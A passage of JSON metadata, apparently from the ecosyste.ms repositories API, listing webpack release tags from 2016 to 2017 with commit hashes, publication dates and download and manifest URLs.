webpack/tags/v2.6.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.6.0/manifests"},{"name":"v2.5.1","sha":"ad2f68f1f21602750ad891ea89a926806acbc95f","kind":"tag","published_at":"2017-05-06T20:07:11.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.1/manifests"},{"name":"v2.5.0","sha":"bf3652b16b65c27db5243aa0d674e2de4a8ccde9","kind":"tag","published_at":"2017-05-04T10:17:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.5.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.5.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.5.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.5.0/manifests"},{"name":"v2.4.1","sha":"bd753567da1248624beaaea14af31d6dbe303411","kind":"tag","published_at":"2017-04-14T13:34:34.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.1/manifests"},{"name":"v2.4.0","sha":"0cbd8fd1a05ee401b5feb95ba2b8edae31571d94","kind":"tag","published_at":"2017-04-14T11:42:58.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.4.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.4.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.4.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.4.0/manifests"},{"name":"v1.15.0","sha":"d4878a55be7a4b7ac4e5db1ae5eef89e15811072","kind":"tag","published_at":"2017-04-13T10:18:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.15.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.15.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.15.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.15.0/manifests"},{"name":"v2.3.3","sha":"ba24c1b163dc038ed738eb4a57dcb241bf63146d","kind":"tag","published_at":"2017-04-03T07:49:56.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.3/manifests"},{"name":"v2.3.2","sha":"6b209b13d76ec43080d6afbad4bb4dd6931e4638","kind":"tag","published_at":"2017-03-25T00:02:19.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.2/manifests"},{"name":"v2.3.1","sha":"4b9b660e8c4fe8ab6425014cb24dcec2d5df194b","kind":"tag","published_at":"2017-03-22T14:40:54.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.1/manifests"},{"name":"v2.3.0","sha":"46dc08e6317170a56df6c34adc8133dd6f70f1fa","kind":"tag","published_at":"2017-03-21T22:43:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.3.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.3.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.3.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.3.0/manifests"},{"name":"v2.2.1","sha":"0445b156d2c958536b72036e68ca6bde0ad32055","kind":"tag","published_at":"2017-01-30T21:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.1/manifests"},{"name":"v2.2.0","sha":"4be093d27942c25ec802a40268ed94e24d886b1d","kind":"tag","published_at":"2017-01-17T19:14:12.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0/manifests"},{"name":"v2.2.0-rc.8","sha":"227846990cbc1a406bb61c5e6cafb3f3f38c8cdd","kind":"tag","published_at":"2017-01-17T18:46:01.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.8/manifests"},{"name":"v2.2.0-rc.7","sha":"0b476022bbbddb206432e20b9c8bc5e91e592202","kind":"tag","published_at":"2017-01-16T15:01:49.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.7","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.7","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.7","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.7/manifests"},{"name":"v2.2.0-rc.6","sha":"97966969b0c9e8425ecb1238deea979c6a18cb27","kind":"tag","published_at":"2017-01-16T02:48:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.6","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.6","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.6","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.6/manifests"},{"name":"v2.2.0-rc.5","sha":"437dce4c8684f4295b5bb68a6ea5662c2660d780","kind":"tag","published_at":"2017-01-15T16:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.5","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.5","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.5","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.5/manifests"},{"name":"v2.2.0-rc.4","sha":"f745f02910cb45a55ed659ebd99288e45a38e873","kind":"tag","published_at":"2017-01-11T15:42:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.4","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.4","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.4","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.4/manifests"},{"name":"v2.2.0-rc.3","sha":"92a8be23614f92bc5669bf43eb0ddf746b2477e7","kind":"tag","published_at":"2016-12-28T15:03:38.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.3","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.3/manifests"},{"name":"v2.2.0-rc.2","sha":"8369cc4c03767d7a76d1f7a047d11e71a550ddae","kind":"tag","published_at":"2016-12-22T10:51:18.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.2","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.2/manifests"},{"name":"v2.2.0-rc.1","sha":"27e604e23100274a8887a5acf0008376d2617071","kind":"tag","published_at":"2016-12-17T08:09:32.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.1","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.1","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.1","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.1/manifests"},{"name":"v2.2.0-rc.0","sha":"057814be1930cc4e8cee22c271823ea821ad067f","kind":"tag","published_at":"2016-12-14T21:32:21.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.2.0-rc.0","html_url":"https://github.com/webpack/webpack/releases/tag/v2.2.0-rc.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.2.0-rc.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.2.0-rc.0/manifests"},{"name":"v2.1.0-beta.28","sha":"2e2eac70ab1ba648ef663b9b93fdedd7928672c4","kind":"tag","published_at":"2016-12-13T07:58:27.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.28","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.28","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.28","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.28/manifests"},{"name":"v1.14.0","sha":"e666686d9029753c243db5880de44aba57151d76","kind":"tag","published_at":"2016-12-07T08:06:02.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.14.0","html_url":"https://github.com/webpack/webpack/releases/tag/v1.14.0","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.14.0","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.14.0/manifests"},{"name":"v2.1.0-beta.27","sha":"adaca2578cc3dcffbb2d0b639cb611a53f6da7c9","kind":"tag","published_at":"2016-11-15T19:00:47.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.27","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.27","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.27","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.27/manifests"},{"name":"v2.1.0-beta.26","sha":"afbdff48ef2d5b304a41e72f4df8d51d629bc96f","kind":"tag","published_at":"2016-11-14T00:07:22.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.26","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.26","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.26","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.26/manifests"},{"name":"v1.13.3","sha":"1a5fd7e8caeef794f67e56d9d734998209b0838c","kind":"commit","published_at":"2016-10-26T14:21:00.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.3","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.3","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.3","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.3/manifests"},{"name":"v2.1.0-beta.25","sha":"3029e5b1b1c486d7b3dd51e753d20bc25ceecd83","kind":"tag","published_at":"2016-09-21T18:31:13.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.25","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.25","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.25","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.25/manifests"},{"name":"v2.1.0-beta.24","sha":"1c4597f1380ff6e5c7bf2f70c997d7ff52773f5b","kind":"tag","published_at":"2016-09-20T19:13:05.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.24","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.24","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.24","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.24/manifests"},{"name":"v2.1.0-beta.23","sha":"8292d2f6597925d6d37fd78b91f0b5cd3798a362","kind":"tag","published_at":"2016-09-19T23:02:08.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.23","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.23","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.23","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.23/manifests"},{"name":"v2.1.0-beta.22","sha":"f5d9a0901cb6b0cca8dcdbb5cd5a2d21de03fde1","kind":"tag","published_at":"2016-09-07T10:43:10.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.22","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.22","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.22","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.22/manifests"},{"name":"v1.13.2","sha":"4b20545b375da82aa6418e6d498f01d543110af0","kind":"tag","published_at":"2016-08-18T08:31:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v1.13.2","html_url":"https://github.com/webpack/webpack/releases/tag/v1.13.2","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v1.13.2","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v1.13.2/manifests"},{"name":"v2.1.0-beta.21","sha":"c7cb6cb9d0d55b9f9185a8e9db02dcf97ac1c0de","kind":"tag","published_at":"2016-08-17T21:23:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.21","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.21","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.21","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.21/manifests"},{"name":"v2.1.0-beta.20","sha":"b3a3ef3d4545fd1ae5e6abd678de96d4ebfcc5de","kind":"tag","published_at":"2016-07-20T22:41:14.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.20","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.20","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.20","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.20/manifests"},{"name":"v2.1.0-beta.19","sha":"21a72529fa6af47185dc14f86b8d8de6dbcb6565","kind":"tag","published_at":"2016-07-17T22:49:23.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.19","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.19","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.19","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.19/manifests"},{"name":"v2.1.0-beta.18","sha":"d826f99e342f7c0ae223a6837d98d2f648780a09","kind":"tag","published_at":"2016-07-15T21:26:36.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.18","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.18","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.18","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.18/manifests"},{"name":"v2.1.0-beta.17","sha":"bc29455e92f4b760db745775a4fca5cde0d01d23","kind":"tag","published_at":"2016-07-13T12:04:51.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.17","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.17","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.17","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.17/manifests"},{"name":"v2.1.0-beta.16","sha":"90d537ef4ce1092f76bd02ee2a75838c67b809fc","kind":"tag","published_at":"2016-07-13T09:11:53.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.16","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.16","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.16","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.16/manifests"},{"name":"v2.1.0-beta.15","sha":"2829516da95a3bb2fe7dde76013f80f0f7e22dbb","kind":"tag","published_at":"2016-06-28T23:23:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.15","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.15","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.15","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.15/manifests"},{"name":"v2.1.0-beta.14","sha":"6748dca837b6402f056b6ac94ffc3c99f8a25c36","kind":"tag","published_at":"2016-06-24T00:02:09.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.14","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.14","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.14","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.14/manifests"},{"name":"v2.1.0-beta.13","sha":"36e4fd2348381d578c43abcbd15ef39a78b5bc07","kind":"tag","published_at":"2016-06-07T22:25:43.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.13","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.13","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.13","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.13/manifests"},{"name":"v2.1.0-beta.12","sha":"3580ec93f8ac7b999fc2faa4bccad31fe6ae5331","kind":"tag","published_at":"2016-06-05T21:02:25.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.12","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.12","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.12","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.12/manifests"},{"name":"v2.1.0-beta.11","sha":"0b1f08022681be796612542c7d0d3c736564a4ff","kind":"tag","published_at":"2016-06-05T18:52:04.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.11","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.11","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.11","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.11/manifests"},{"name":"v2.1.0-beta.10","sha":"2343af44bb4314bafc1ba29cd019bc4b28edbcbf","kind":"tag","published_at":"2016-06-05T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.10","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.10","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.10","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.10/manifests"},{"name":"v2.1.0-beta.9","sha":"dc3bd055027d8d1ebbb0ebdd07fb73387a0ab6d1","kind":"tag","published_at":"2016-06-04T18:19:59.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.9","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.9","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.9","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.9/manifests"},{"name":"v2.1.0-beta.8","sha":"abf0cefd592700a19856c3ef9b6d65f905ec73c1","kind":"tag","published_at":"2016-05-29T18:53:06.000Z","download_url":"https://codeload.github.com/webpack/webpack/tar.gz/v2.1.0-beta.8","html_url":"https://github.com/webpack/webpack/releases/tag/v2.1.0-beta.8","dependencies_parsed_at":null,"dependency_job_id":null,"purl":"pkg:github/webpack/webpack@v2.1.0-beta.8","tag_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8","manifests_url":"https://repos.ecosyste.ms/api/v1/hosts/GitHub/repositories/webpack%2Fwebpack/tags/v2.1.0-beta.8/manifests"},{"name":"v1.13.1","sha":"01ea02a95cf8c446fd1dc9e82fae0febe9332034","kind":"tag","published_at":"2016-05-20T06:48:36.000Z","download_url":"h